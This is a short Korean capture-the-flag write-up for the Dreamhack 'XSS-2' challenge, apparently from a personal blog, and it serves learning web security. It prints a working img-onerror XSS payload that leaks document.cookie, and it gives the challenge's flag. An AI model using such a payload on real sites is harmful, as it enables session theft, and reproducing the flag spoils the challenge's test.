XSS-2

2024. 5. 25. 00:28웹 해킹/Dreamhack Wargame

XSS 취약점을 활용해 FLAG를 획득하는 문제

1. XSS-1과 같은 URL이지만 이번에는 스크립트가 작동하지 않는다

 

2. 그럼 XSS를 발생시킬 수 있는 <script>태그가 아닌 다른 태그를 사용한다

3. <img src=x onerror=location.href=”/memo?memo=”+document.cookie> 코드 입력

flag=DH{3c01577e9542ec24d68ba0ffb846508f}

'웹 해킹 > Dreamhack Wargame' 카테고리의 다른 글

sql injection bypass WAF  (0) 2024.05.26
simple_sqli_chatgpt  (0) 2024.05.26
XSS Filtering Bypass Advanced  (0) 2024.05.25
XSS Filtering Bypass  (0) 2024.05.25
XSS-1  (0) 2024.05.25